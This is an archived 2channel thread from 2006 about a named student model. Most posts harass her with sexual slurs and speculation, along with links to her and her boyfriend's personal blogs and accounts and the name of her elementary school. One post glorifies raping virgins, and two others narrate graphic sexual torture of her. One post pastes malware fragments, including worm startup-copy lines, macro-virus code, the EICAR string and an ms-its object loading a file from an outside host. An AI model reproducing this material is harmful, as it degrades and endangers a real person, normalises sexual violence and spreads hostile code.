2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

KING読モ★かわいすぎる★小正裕佳子ちゃん★Vol.3

1 :無名モデル:2006/10/03(火) 13:14:11 ID:d3z8LAED
新雑誌KINGで活躍中の小正裕佳子ちゃんについて語るスレです…存分に語り合いましょう!!!☆
(前スレ)
かわいすぎる★小正裕佳子ちゃん★Vol.2
http://life7.2ch.net/test/read.cgi/model/1145946495/
KING
http://www.x-king.jp/
http://www.x-king.com/
美人東大生は何でも興味津々!でも平日は実験の毎日だったりします・・。
Miss CampusPark Diary - Yukako Komasa -
http://www.campuspark.net/blog/yukakok/
http://www.campuspark.net/blog/yukakok/index.php?ID=20 nail はいかが? [everyday life]
http://www.campuspark.net/blog/yukakok/index.php?ID=6 富山名産 [everyday life]
http://www.campuspark.net/blog/yukakok/index.php?ID=3 東京駅の夜 [everyday life]
銀のブログ | 小正裕佳子
http://blg.spon.boo.jp/?eid=249576
東京大学新聞社
http://www.utnp.org/todai2005.html
[M] 歴代ミス東大について 3
http://campus.milkcafe.net/test/read.cgi?bbs=toudai&key=1134376968
女優魂 中京テレビ
http://www.ctv.co.jp/joyu/2005/1101/job.html
頭脳バトルBRAIN-X
http://ja.wikipedia.org/wiki/%E9%A0%AD%E8%84%B3%E3%83%90%E3%83%88%E3%83%ABBRAIN-X

2 :無名モデル:2006/10/03(火) 13:29:45 ID:???
スレ立て主キモー
やはり本人か?WWW


3 :無名モデル:2006/10/03(火) 13:43:00 ID:???
需要ねーくせに立てるなボケ

4 :無名モデル:2006/10/03(火) 13:56:57 ID:???
2
大多数のアンチと極少数のコマサ教信者のためのスゥレの出来上がりだね♪
おめでとうございます!

5 :無名モデル:2006/10/03(火) 16:09:37 ID:???
アンチスレ立て直したほうがいいかもね。彼氏のブログとかも入れたいw


6 :無名モデル:2006/10/03(火) 17:25:29 ID:???
>>3
需要ないならカキコするな、ボケ

7 :無名モデル:2006/10/03(火) 17:33:15 ID:???
私の新しいスレができて嬉しいです**★

8 :無名モデル:2006/10/03(火) 18:04:48 ID:hDA1C2Xc
>>5
立ててよ。

9 :無名モデル:2006/10/03(火) 19:01:52 ID:???
>>8
こないだ別スレ立てたから立てれなかったw

10 :無名モデル:2006/10/03(火) 20:11:41 ID:fSvxEkc2

八田亜矢子さんの動画:
http://staging.t1gp.jp/movie/001.wmv
小正裕佳子さんの動画:
http:/staging.t1gp.jp/movie/002.wmv

どちらも可愛い、綺麗です

11 :無名モデル:2006/10/04(水) 18:51:35 ID:qU3jMo3n
動画かわいい
実物もこんなかんじ?

12 :無名モデル:2006/10/06(金) 10:16:38 ID:???
この人の母方のいとこの高卒女を知ってるけど、
顔も歯並びもそっ髪型もそっくりだよ。
さすがに声までは似てないけど。
小正という苗字も珍しいが、そのいとこの苗字も珍しい部類に入る。

13 :無名モデル:2006/10/06(金) 17:14:15 ID:???
その人も可愛いんですね

14 :無名モデル:2006/10/06(金) 18:28:44 ID:???
あの歯並びをかなり出っ歯にして黄ばませた感じ。

15 :無名モデル:2006/10/06(金) 19:13:36 ID:???
990:M :2006/10/06(金) 15:43:56 ID:T+fg9Tv+

今でもよしきさんが好き。去年の今頃は毎日ボストンに国際電話して。
私は、こまささんのように美人じゃないしお勉強もできない。
だから、いつもよしきさんと周りの方々についていこうと必至だった。
よしきさんたちの日記で彼女という言葉は、私を示していたのに
今はもう違う。忘れたくて、結婚も決めたけどあなたが忘れられない。
でも、今更連絡もできない。
私が12月に結婚してフランスへ行けば、
よしきさんへの気持ちは吹っ切れるのかな。

16 :無名モデル:2006/10/06(金) 19:14:48 ID:???
992:M :2006/10/06(金) 16:32:22 ID:T+fg9Tv+
991さんへ
私は、よしきさんの元カノです。
私との間に距離ができて、その間に彼女と出逢ったみたいです。
私たち2人の破局の原因はこまささんではないです。
私はずっとやり直したくてよしきさんからの連絡を待ちました。
でも、結果的に素敵な女性にめぐり合って私は選ばれなかった。
彼女は、私がずっと憧れていた人だし、直接の知り合いではないけど
きっと素敵な方なんだなって思うの。
でも、わかってるのに諦めきれなくて。
彼への未練はないってみんなに思わせるために、他の人との結婚を決めて。

17 :無名モデル:2006/10/07(土) 00:23:31 ID:???
たいして綺麗でもないのにサングラスでセレブ気取り。うぜぇんだよ。誰もおまえのこと見てねーし。

18 :無名モデル:2006/10/07(土) 01:58:28 ID:???
レイプするなら処女に限るね。
非処女はレイプすると貞操よりも命の心配するからサッパリ萌えない。
その点処女はとにかく貞操の危機感が丸出しでマジ萌える。
処女にレイプでトラウマを与える。 これってある意味芸術。
処女をレイプする時「いただきま〜す」って言う。
「ぞうぞおあがりなさい」って言ってくれるまで殴る。殴りつづける。
言ってから挿入して精神的には和姦にしてやる。
女にやがて彼氏ができたり家庭を持って子供ができたりした時、
日常生活で食事のたびにレイプでの処女喪失を思い出す。 間違いなく芸術。
挿入後には歌を聞かせてやろう。
クリスマスソングやバースディソングを唄いながらのレイプなんてもう最高。
毎年そのシーズンに処女のままレイプされた事を思い出す。
町中がネオンで輝けば破瓜の痛みが心をチクリ。 これぞ芸術。
強制フェラをさせながら 「愛してる、好きだよ」と何度もささやくなんてのもポイント高め。
やさ男とのまともな恋愛(?)をしても何かの拍子にこれを言われたら処女喪失と
強制フェラを確実に思い出す。 これぞ芸術の中の芸術。
もちろんフィニッシュは中出し。これ最強。
逝く時は「僕達の子供出来るよね?僕達の子供、ずっと大事にしようね。名前も決めよう」と
何度も繰り返す。結婚した後、ダンナにこんなこと言われたら漏れとの
激しい処女喪失&中出し&妊娠を思い出す。既にそれは芸術アカデミー。
そして、レイプされた女がその事を男に告るのがまた萌える。
話を聞いた彼氏は怒りと悔しさでプルプル拳を震わすに違いない。まさに至高の芸術。
そんな彼氏に一生懸命理解を求める姿がまたいい。これはもう男として最高の栄誉。
レイプで処女を喪失したことを彼氏に告る事で自分を維持していこうという姿勢と
一緒に乗り越えようとか言ってる二人の姿はまるで傷ついて飛べなくなった小鳥たちのようだ。
芸術の殿堂とはまさにこのこと。

19 :無名モデル:2006/10/07(土) 02:59:26 ID:???
小正ってウザイって言葉が似合うねー

20 :無名モデル:2006/10/07(土) 10:36:02 ID:???
本人、>>15>>16読んだのかな?
http://blog.m.livedoor.jp/ishikun3/c.cgi?sss=stseugroodevil&id=50725473

21 :無名モデル:2006/10/07(土) 11:11:11 ID:???
心配になってよしきに電話したねW
電話での会話↓
「私は何もしてないのに、みんなに色目つかってるって誤解されちゃうの」
「こまぴが綺麗すぎて男が勝手に寄ってくるからいけないんだよな」
「こまぴはそんなつもり全然ないのよ。みんなが大好きなのに」
「お前は特別だから嫉みは仕方ない。完璧すぎるんだから」
「よしきだいしゅき〜♪」ハゲワロスWWWWW

22 :無名モデル:2006/10/07(土) 13:24:26 ID:???
>>20>>21
2ちゃんとブログが連動してて笑えるww
ネラーカップルきもー

23 :無名モデル:2006/10/07(土) 15:06:46 ID:???
そろそろばばぁ=じじぃが来るぞwwwwwww

24 :無名モデル:2006/10/07(土) 16:57:42 ID:???
30 :無名モデル :2006/05/19(金) 23:17:25 ID:???
「こまぴ」って名前でmixiやってる。マイミクの中に彼氏もいるよ。
誕生日当日はもちろん彼氏と。
http://mixi.jp/show_friend.pl?id=1144431

70 : :2006/05/21(日) 01:32:39 ID:6cTIuyjx
彼氏のブログにも「こまぴ」で書いてる。
http://blog.livedoor.jp/ishikun3/archives/50538637.html

744 :無名モデル :2006/08/26(土) 15:40:22 ID:6Dkd/LlC
487 名前:名無しさん [2006/08/25(金) 12:04 ID:INMX7Awo]
小正新ブログ→http://blog.livedoor.jp/comapi3/

25 :無名モデル:2006/10/07(土) 18:14:27 ID:???




まだmixiの垢持って無くて欲しい人はここまでメールくれれば招待するよ

2chvsmixi@mail.goo.ne.jp 或いは gigawarosso@yahoo.co.jp

にネット上の晒してないメルアドを連絡してくれ





26 :無名モデル:2006/10/08(日) 15:59:04 ID:???
この女うぜー

27 :無名モデル:2006/10/08(日) 16:00:35 ID:???
こまぴミクシィ更新してる?

28 :無名モデル:2006/10/08(日) 17:20:20 ID:???
ぶす

29 :無名モデル:2006/10/08(日) 17:54:46 ID:???
>>27
更新してないよ。というかmixi日記=ブログだし
でもマイミクにコメントつけたりしてるねー

30 :無名モデル:2006/10/09(月) 19:09:45 ID:???
よしきとうまく行ってないのかな?

31 :無名モデル:2006/10/09(月) 19:23:19 ID:???
こまぴ欲求不満なの!
ちゃんと気持ち伝わってこないよ。可愛いこまぴにはよしくんの他に男なんていくらでもいるもの。あんな男もう知らない!さあ、他のチンポ!

って感じかなW

32 :M:2006/10/10(火) 09:20:07 ID:UFhJczip
990&992を書いたMです。
連休中、婚約者と会っていても、頭の中は・・・。
アメリカで使ってる携帯番号は、去年のものと一緒なのかな。
お電話したい・・・ボストンへ行きたい・・・。

33 :無名モデル:2006/10/10(火) 10:44:34 ID:???
こまぴから奪っちゃえ!!略奪略奪!なんとなくうまくいってないみたいだし勝ち目あるから。電話するかよしきのブログに書き込みな☆応援してる。婚約者には秘密でね!

34 :無名モデル:2006/10/10(火) 11:26:50 ID:???
彼氏のブログ見たけどコマサと別れそうだねー
つーか恋愛をあんな実況中継する彼氏やだw 
「男と女のすれ違い」って記事、あれ絶対コマサとの話じゃん

35 :無名モデル:2006/10/10(火) 11:42:34 ID:???
男がいないと生きて行けない女なんだろうね。

36 :無名モデル:2006/10/10(火) 12:02:20 ID:FCcEZqiL
小正さん院試を失敗でもしたのかなあ?

37 :無名モデル:2006/10/10(火) 12:24:08 ID:???
ざまぁみろw

38 :無名モデル:2006/10/10(火) 13:01:42 ID:???
よしきさん、確かに面白いことを書いてるけれど、あれがこまささんとのことだと思うと恥ずかしい。赤面モノ。結局こまささんとの付き合いはゲームなのね。一応ミスだから付き合ってみるか〜みたいな感じだったんじゃない?

39 :無名モデル:2006/10/10(火) 13:54:21 ID:???
ブログのネタにするために付き合ったんじゃない?w

40 :無名モデル:2006/10/10(火) 22:22:33 ID:???
彼氏ここでブログのためとか書かれたら話題変えたね。すれ違いシリーズの続編求む。

41 :無名モデル:2006/10/10(火) 22:24:12 ID:5unbyg7L
こまさは顔は派手だが、実際しゃべってるところ見ると普通のかわいい娘じゃん。

42 :無名モデル:2006/10/10(火) 22:30:00 ID:???
↑よしき登場wwwwww

43 :無名モデル:2006/10/10(火) 22:40:29 ID:???
顔派手?
どちらかというと地味顔。小さいつり目だからキツい感じではあるけど。化粧が濃いから派手?

44 :無名モデル:2006/10/11(水) 01:11:14 ID:EDdUA0Fa
顔や服装、髪型含めてね。しかし、一般よりは派手な顔立ちだろ。
見た目と実際のギャップがあるなと。。

45 :無名モデル:2006/10/11(水) 01:35:47 ID:???
髪型は了解。パサパサでかわいそうなところ。見た目と実際とは何ですか。
ーいじわるそうな内面が洩れた外見ということね。

46 :無名モデル:2006/10/11(水) 06:07:40 ID:YLot5iT1
トライの動画可愛いよ

47 :無名モデル:2006/10/11(水) 12:20:19 ID:???
八田さんより小正さんの方が好きだな

48 :無名モデル:2006/10/11(水) 16:13:33 ID:???
よしき、もっとコマサとのことブログで暴露してよ!

49 :無名モデル:2006/10/12(木) 02:22:23 ID:23+519+N
八田にどこがいいんだよW 理解不能

50 :無名モデル:2006/10/14(土) 00:22:31 ID:mYABroS0
こまぴーかわいいよ〜〜。
付き合ってよ〜

51 :無名モデル:2006/10/15(日) 00:30:23 ID:F75RQPQV
よしきがブログで言い訳してんね。

52 :無名モデル:2006/10/15(日) 12:54:18 ID:???
おい、よしき!
お前は何したいんだ?
こまぴと別れたいのか?

53 :無名モデル:2006/10/15(日) 19:36:45 ID:???
違う女の子のこと書いてるね

54 :無名モデル:2006/10/18(水) 19:37:50 ID:WHVJvz6G


55 :<body onload=window()>:2006/10/19(木) 00:21:08 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


56 :無名モデル:2006/10/21(土) 10:56:35 ID:Q5RYhaQj
趣味の悪い女に変態男カップルw

http://blog.m.livedoor.jp/ishikun3/comments_view.cgi?sss=stseugroodevil&id=50739443

57 :無名モデル:2006/10/21(土) 11:45:35 ID:???
>>56
こまぴの表記cmpになってる。MKOでみきおと同じだねー浮気?
身近にいる彼氏の友達に乗り換えるヤリマン女、最低

58 :無名モデル:2006/10/24(火) 03:57:31 ID:???
http://www.google.com/gwt/n?u=http%3A%2F%2Fmasa77.exblog.jp%2F4205261%2F&hl=ja&mrestrict=chtml&q=COMAPI++%E5%BD%BC&output=chtml&site=search&source=m 笑える

59 :無名モデル:2006/10/24(火) 13:21:42 ID:???
>>58
内容教えて!

60 :無名モデル:2006/10/24(火) 13:44:14 ID:???
見れない?
実習でこまぴに逢って惚れたらしい。こまぴとスペイン料理。勝手に妄想してる。オタ。

61 :無名モデル:2006/10/24(火) 15:36:17 ID:???
>>60
携帯からだと、変なメガネをかけた女の画像が出てきただけだった。
何月何日の日記か教えて!

62 :無名モデル:2006/10/24(火) 18:29:29 ID:???
変なメガネの真鍋かをりのずっと下の方にあるよ。前後の経過もおもしろいから見て。モ娘矢口がこまぴに見えるんだって、このひと。幻覚だねWWW

63 :無名モデル:2006/10/26(木) 17:11:03 ID:???
こまぴ、アンチからの人気すらなくなったみたいだな。

64 :無名モデル:2006/10/28(土) 09:27:38 ID:???
>>63
つまり終わってるってこと

65 :無名モデル:2006/10/29(日) 23:09:56 ID:MY+Pkjzx
小学校何処?

66 :無名モデル:2006/10/29(日) 23:57:55 ID:???
宝塚第一小。
前スレやミルクには、小学校時代の嫌われぶりが書き込まれてた。

67 :無名モデル:2006/10/30(月) 00:59:02 ID:???
また別のブログ始めたよ。浮気性?他の男と一緒に書いてる
http://3rdplace.blog75.fc2.com/?mode=m&no=4

68 :無名モデル:2006/10/30(月) 10:35:50 ID:???
ちょwww何このメンヘラーの集いはwww3Pバーまじきんもーっ☆

69 :無名モデル:2006/10/30(月) 11:01:02 ID:???
結局男としかつるめないヤリマン

70 :無名モデル:2006/10/30(月) 12:38:30 ID:???
>>68
ほんとだ3Pバーだwww
実際3Pしてそう。コマサの日記も欲求不満ぽいし。
まじきも

71 :無名モデル:2006/10/30(月) 13:03:00 ID:???
つうかまたみきおとかとブログ書いてるんじゃね?

72 :無名モデル:2006/10/30(月) 13:34:40 ID:???
良かったね、アンチからの人気が戻ってきて。乱交ブログのおかげ。擁護は減るばかりだけれど。

73 :無名モデル:2006/10/30(月) 18:56:40 ID:???
>>71
Mっていうの、それっぽいね。
彼氏の友達内で回されてそう。彼氏が海外にいるからって彼氏の友達みんなとヤる女って一体

74 :無名モデル:2006/10/30(月) 22:08:41 ID:???
ボストンの彼、ブログも沈没寸前だね。
すごいみじめ。
自慢の美人彼女あっての彼の存在だったのに。

別れそうな今となってはただの間抜けな男、アメリカに
一人旅って感じだね。
あんなブログ全部読む奴いるはずねーだろ。
今年いっぱい続かないな。
ブログも恋愛も。

でも、一番びっくりなのは、こんなにも早く関係って崩れるの?
どちらかが異常じゃないと考えにくいね。
お互い好きじゃなかったんだろうね、きっと。

75 :無名モデル:2006/10/30(月) 23:04:18 ID:???
気が強そうな顔をし、また自立した女と認めてもらいたいくせに
実際は男がいないと生きていけない女w
そういう演出がアンチを刺激しているのかと。。

76 :無名モデル:2006/10/30(月) 23:26:31 ID:???
>>74
ほんとだねー
それにしても、彼氏の親友に平気で乗り換える小正って最低すぎ・・・多分MKOってヤツに乗り換えたっぽい。

77 :無名モデル:2006/10/30(月) 23:28:36 ID:???
小正って文章だけ読んでるとかなりきもい。「おなご」とかいう言葉使いとか・・・
喪女って感じ

78 :無名モデル:2006/10/30(月) 23:36:38 ID:???
自慢の美人彼女W

79 :無名モデル:2006/10/31(火) 00:52:54 ID:???
http://masa77.exblog.jp/5930514/
こいつキモイ

80 :無名モデル:2006/10/31(火) 01:47:30 ID:???
http://mblog.excite.co.jp/user/masa77/entry/detail/?id=4863705&_s=a29e2f2d4f3a581f0e98406331f21639 このやりまん女!

81 :無名モデル:2006/10/31(火) 03:11:29 ID:???
http://mblog.excite.co.jp/user/masa77/entry/detail/?id=5874486&_s=a29e2f2d4f3a581f0e98406331f21639 この日もいいね

82 :無名モデル:2006/10/31(火) 09:33:59 ID:???
そのブログの男とデートしたりしてた頃、よしきに乗り換えたって感じかな?
つまり同時進行?

83 :無名モデル:2006/10/31(火) 19:49:20 ID:???
そういうことだな。

84 :無名モデル:2006/10/31(火) 20:14:26 ID:???
そしてよしきからその親友MKOに乗り換えたわけだ
輪姦て感じだね

85 :無名モデル:2006/10/31(火) 22:16:21 ID:???
でもそれだけ可愛いからモテるってことだよね。取り巻きの男全制覇って感じじゃない?高級な化粧品揃えて、アフロートでカラー、洋服はブランド物ばかり。世の中不公平だね。

86 :無名モデル:2006/10/31(火) 23:20:02 ID:???
本人来てるぅ〜
z(ryなんて安物だよw

87 :無名モデル:2006/10/31(火) 23:36:36 ID:???
zって何?

88 :無名モデル:2006/10/31(火) 23:38:12 ID:???
>>85
さりげない擁護の自演はは大分前からバレてますよー

89 :無名モデル:2006/10/31(火) 23:44:51 ID:???
みんなあたしがうらやましくて仕方ないみたい。あたしより完璧な人見たことない。

90 :無名モデル:2006/10/31(火) 23:52:31 ID:EmYU1f+h
>>89
お前メール欄にみきおだのよしきだの書いてるやつだろ?
お前ばかり書きこんでるから目立つ。

91 :無名モデル:2006/11/01(水) 00:31:55 ID:???
そうだけど文句あって?W本人乙W

92 :無名モデル:2006/11/01(水) 01:26:46 ID:???
「取り巻き」の全制覇がモテるって何かカン違い。
普通モテる子って取り巻きと彼氏にする男をハッキリ区別して、
取り巻きを片っ端から彼氏に格上げなんてしない。
たかが「取り巻き」にそんなエサあげまくってどうする。
モテると思ってんのは本人だけで「取り巻き」連中はほくそ笑んでんじゃないの。

93 :無名モデル:2006/11/01(水) 01:43:02 ID:???
男から見れば、「すぐヤレる都合のいい女」
「いい女」だと勘違いしているのは小正本人だけw
まあ、だからこそ便利な肉便器なんだけどね。

94 :無名モデル:2006/11/01(水) 01:44:26 ID:???
漫画の世界じゃないんだから、大学生にもなって取り巻きって・・・
暇を潰せるような女友達がいないから男と暇潰してるだけでしょ?

95 :無名モデル:2006/11/01(水) 02:28:05 ID:???
>>94
それもまた切ない理由だね…

96 :無名モデル:2006/11/01(水) 18:48:46 ID:???
彼氏の友達の輪に必死にしがみついてるくせに、私ってモテモテ?とか言ってたらしい。

97 :無名モデル:2006/11/02(木) 18:43:04 ID:???
取り巻きの男どもにとって、格好の肉便器w

98 :無名モデル:2006/11/02(木) 19:45:38 ID:???
モテテルつもりで、結果として取り巻きの男にやられただけって事にはならないよねw
妊娠してヤリ逃げされても、あれだけ可愛ければ、俺の子として育てるなんて奇特な男があらわれそうだよねw

99 :無名モデル:2006/11/02(木) 19:56:20 ID:???
よしきはいい奴だよ。
女は最悪。乗り換えすぎ。
つか生でみるとそうもかわいくないのだがw
写真はかわいいね。誰かわかんなかったよ。
菊川なんかと比較すると劣等もいいとこだ

100 :無名モデル:2006/11/02(木) 22:21:47 ID:???
あれだけ可愛いければW

101 :無名モデル:2006/11/03(金) 08:35:00 ID:???
こまぴは顔が肉まんに似てる

102 :無名モデル:2006/11/03(金) 12:48:24 ID:???
というか肉まんそのもの

103 :無名モデル:2006/11/03(金) 16:25:52 ID:???
肉まんこ

104 :無名モデル:2006/11/05(日) 20:52:54 ID:???
http://blog.m.livedoor.jp/ishikun3/c.cgi?sss=stseugroodevil&type=more&id=50756334 ハゲワラ☆大事な人たくさんいるんだ☆

105 :無名モデル:2006/11/05(日) 21:15:04 ID:???
>>105
こまぴは今頃自分の友達みきおとヤッてるのに、哀れなよしきww

106 :無名モデル:2006/11/07(火) 00:51:48 ID:???
どうやら肉まんこからよしきに手出したようだね

107 :無名モデル:2006/11/07(火) 02:03:31 ID:???
>>106
そうみたいだねー
恋愛対象外だったみたいに書かれてるもんね。肉まんこ・こまぴ発情きもい

108 :無名モデル:2006/11/07(火) 04:30:18 ID:???
赤いバラの花束を隅に隠し、プレゼントを出すから待つようにと目隠しをする。甘いキスに驚く裕佳子。強引にねっとりした下腹部に指を滑らせ、Vネックのニットの上から胸を愉しむ。「やめて、まだ早いよっ?」と裕佳子。
俺は花束から刺の多そうな一本のバラを引き抜いた。パンティをずらし、いやらしい秘密の穴にずぷりと差し込む。
「痛、痛いよっ何するの!」泣きわめく裕佳子・・・。バラよりも鮮やかな血が穴から流れ出ている。嫌がる裕佳子の口を塞ぎ、俺は何本も何本も差し込み続けた。
「裕佳子、もう20本も入ったぞ」ぐったりとして答えのない裕佳子・・・。

109 :無名モデル:2006/11/07(火) 15:01:12 ID:???
しばらく花瓶と化した恥部を眺めたが飽きてきてしまった。そこでバラを抜くことにした。ぬぷぬぷと時折ひっかかる手応えを感じながら。痛いと消え入るような声で抵抗する裕佳子・・・。そして全部のバラを抜いたところで俺のモノを差し込む。ずぽっずぽっ・・・
「この淫乱な女が!だが今日は締まりがいいぞ!ああっああっ!」


110 :無名モデル:2006/11/07(火) 17:15:03 ID:???
きもー

111 :無名モデル:2006/11/08(水) 18:33:35 ID:???
>>108>>109
友達みきおに肉まんこコマサをとられた留学男よしき
やっぱり変態だね

112 :無名モデル:2006/11/11(土) 18:27:17 ID:???
よしきも小正も気持ち悪いブログ。
自分に酔ってるといつ気づくんだろ。

113 :無名モデル:2006/11/14(火) 13:31:33 ID:???
肉まん本人来てるよね?
>>74とか>>85とか大爆笑なんだが

114 :無名モデル:2006/11/14(火) 18:58:41 ID:???
高橋メアリージュンの顔を薄くして、歯並び悪くしてスタイルを悪くした感じ。

115 :無名モデル:2006/11/14(火) 19:22:50 ID:Wlcy+3VX
みんな憶測で物を言うのは良くないよ

116 :無名モデル:2006/11/14(火) 19:33:42 ID:???
どの辺りが憶測なのでしょうか

117 :無名モデル:2006/11/14(火) 19:45:51 ID:???
メアリージュン!
目が似てるかもねっ
いやらしそうな釣り目

118 :無名モデル:2006/11/15(水) 01:59:10 ID:???
よしき繋がりしか友達がいないのはガチ。

119 :無名モデル:2006/11/17(金) 08:48:22 ID:???
フリーターになるのかな

120 :無名モデル:2006/11/17(金) 10:09:13 ID:???
モデル☆

121 :無名モデル:2006/11/17(金) 22:17:52 ID:???
スターダスト?

122 :無名モデル:2006/11/18(土) 01:45:42 ID:???
どこ情報?

123 :無名モデル:2006/11/18(土) 09:33:16 ID:S1KKYXEM
フリーターになるっぽいことは、mixiのコメントに書いてた
マイミク日記のコメント

124 :無名モデル:2006/11/18(土) 10:15:09 ID:???
ハーバードめざすんじゃない?

125 :無名モデル:2006/11/18(土) 10:24:16 ID:???
それ思った!
よしきのそばにいたいからハーバード行くんだろうね。
身の程知らずがまた始まったって感じwwww

126 :無名モデル:2006/11/18(土) 10:33:08 ID:QWagM0h1
身の程知らずじゃないと思うぞやれば出来ると思う

神戸の女の子って、読者モデルになるのがステータスなのかな?
特に、お家が裕福で大学入ったら読者モデルになって、裕福で高級品身につけているから、益々話題になって、という成金?の女の子多いよね

神戸読者モデルは殆ど好きじゃないけど、コマサさんは嫌みがないから好きだな。

127 :無名モデル:2006/11/18(土) 11:05:06 ID:???
そっか、今日は土曜日だったな。
非童貞の大学生クンが出張してきたわけかw

128 :無名モデル:2006/11/18(土) 13:21:07 ID:???
八田スレより

>>126
=701:無名モデル :2006/11/18(土) 10:24:14 ID:QWagM0h1
この人確かに可愛いけど
東大に入れたことが、かえってこの人をダメにしたと思う
学歴主義時代はもう終わりだよ
この人は元が頭良いから、別に東大なんか行かなくても、周りの人が一緒にいて気がつくよ、あ、この子頭良いって
大学出ていても馬鹿は馬鹿だし、仕事できない人はできないよ
高卒でも頭が良い人は沢山いる

129 :無名モデル:2006/11/18(土) 17:19:59 ID:???
フリーターww

130 :無名モデル:2006/11/18(土) 17:38:36 ID:???
ミクシィを見てないから詳細はよくわかんないけど、
好きでフリーターになったわけじゃなさそう。
ミスキャンブログでは、夏は院試(東大院のことと思われる)で忙しいからとか言ってたしね。
院は誰でも入れるとタカをくくり、院試直前にボストンまでよしきを追ってったのが致命傷になったのかもな。

131 :無名モデル:2006/11/18(土) 23:02:20 ID:???
人生挫折も必要

132 :無名モデル:2006/11/19(日) 00:37:16 ID:???
こまぴのマイミクMKOのコメントにフリーターになるっぽいこと書いてあるね
東大出てニートになる人って結構いるみたい。
人生の目標が東大だったから、卒業後の目標が決まらないのかな

133 :無名モデル:2006/11/19(日) 01:56:30 ID:???
>>132
コピペしてきてよー

134 :無名モデル:2006/11/19(日) 02:41:47 ID:???
こまぴ愛原リオナにそっくり〜携帯で見てね☆
http://bikini.koyaji.net/sys/details.php?n=bikini&id=1498
こまぴを整えた感じ。

135 :無名モデル:2006/11/19(日) 02:54:19 ID:???
http://realog.jp/user_img/tt0711/lg_20061006_014602_0_2.jpg 前に出たメアリージュンも確かに似てるね〜
携帯でみて

136 :無名モデル:2006/11/19(日) 08:24:39 ID:???
気になって愛原リオナスレ見たWWWこまたんのヌードがイパーイ!!上原綾とかいう元AV女優らし〜
http://i-navi.cc/ds/av/240/uehara-aya/04.shtml

137 :無名モデル:2006/11/19(日) 14:54:15 ID:???
はっきり言ってこまぴの方が格段にヌサ○ク

138 :無名モデル:2006/11/20(月) 10:07:48 ID:???
愛原リオナに失礼だ
でもこまぴがミスになったとき、2chでキャバ顔って言われてたの思い出した
東大卒キャバ嬢なんてどうだろう

139 :無名モデル:2006/11/20(月) 19:12:45 ID:???
http://i.yicha.jp/images?f=1&z=1&t=0&p=:240:60304:54:09417860&s= 昔の橋本麗香。似てる?
こまぴぃに

140 :無名モデル:2006/11/20(月) 19:52:19 ID:???
>>138
そんなに前からいるんだねw
それともにくちゃんでも読んだの?
個人的には、準の小島の方が鼻につくブリッコで嫌いだ。

141 :無名モデル:2006/11/20(月) 20:17:10 ID:???
>>140
たまたま昔、駒場祭の時期に興味があってのぞいたんだよ
個人スレ立ってたのは知らなかった。すっかり有名人だね

142 :無名モデル:2006/11/20(月) 21:42:18 ID:???
その時の話、ちょっと聞かせて欲しいです。
過去ログは残ってますか?

143 :無名モデル:2006/11/21(火) 16:21:08 ID:dbHASfQW
>>140
小島はローに行くの?



144 :無名モデル:2006/11/21(火) 20:57:54 ID:???
>>143
確か国一志望だったような・・・

145 :無名モデル:2006/11/23(木) 22:40:21 ID:oZt+vHim

279 名前:浪人生@山梨県[] 投稿日:2006/11/23(木) 20:16:09 ID:GM0w1nUR0
646 名前: 名無しさん@七周年 Mail: 投稿日: 2006/11/23(木) 14:49:16 ID: zQCz4F7m0
> MISS Cam Blog(サイバーエージェントとキャンパスパークが提携して運営)でぐぐって3番目のサイトの資料
> ttp://adinfo.ameba.jp/2007-2Qmisscam.pdf
>
> >ミスキャンブロガーが、自らのブログで御社商品を紹介!
> >タイアップページにてより詳しい商品紹介をする事で、クチコミ
> >によって興味を持ったユーザーの商品理解を促進。
> >¥2,5000,000
>
> >通常タイアップページ+「ミスキャンモデル」4名が3記事ずつそ
> >れぞれのブログに書き、さらTiaraGirlHeadline」でもタイ
> >アップを組む、クロスメディアプロモーションメニューです。
> >TiaraGirlHeadLineはTiaraGirlのダイジェスト版のフリー
> >ペーパーで、東京を中心に5万部発行されています。
> >¥4,000,000
>
> >通常タイアップページ+「ミスキャンモデル」4名が3記事ずつそ
> >れぞれのブログに書き、さらに雑誌「TiaraGirl」でもタイアップ
> >を組む、クロスメディアプロモーションメニューです。TiaraGirl
> >の詳細は下記をご覧下さい。
> >¥6,000,000
>
> 桁間違ってるわけじゃないよ


146 :無名モデル:2006/11/27(月) 12:32:01 ID:???
今年のミス成蹊の子、小正さんに似てる気がする。

147 :無名モデル:2006/11/29(水) 12:36:07 ID:???
パンパンの顔がそっくりだね

148 :無名モデル:2006/11/29(水) 13:56:59 ID:???
よしきとやりまくりだった4日間w
欲求不満が解消されて良かったねw

149 :無名モデル:2006/11/30(木) 12:29:54 ID:jd/1qtiA
彼氏のブログに SEX堪能したんですね、みたいなコメントした人うけるww

150 :無名モデル:2006/11/30(木) 14:18:56 ID:???
本当だー!w

http://blog.m.livedoor.jp/ishikun3/comments_view.cgi?sss=stseugroodevil&id=50779074

151 :無名モデル:2006/11/30(木) 23:59:12 ID:COGC7/h7
http://blog.livedoor.jp/ishikun3/archives/50779074.html#comments


152 :無名モデル:2006/12/01(金) 00:30:54 ID:???
菊川もブスじゃん・・・・

153 :無名モデル:2006/12/01(金) 04:14:55 ID:???
↑貴様はひっこんどれ。チンカス野郎が

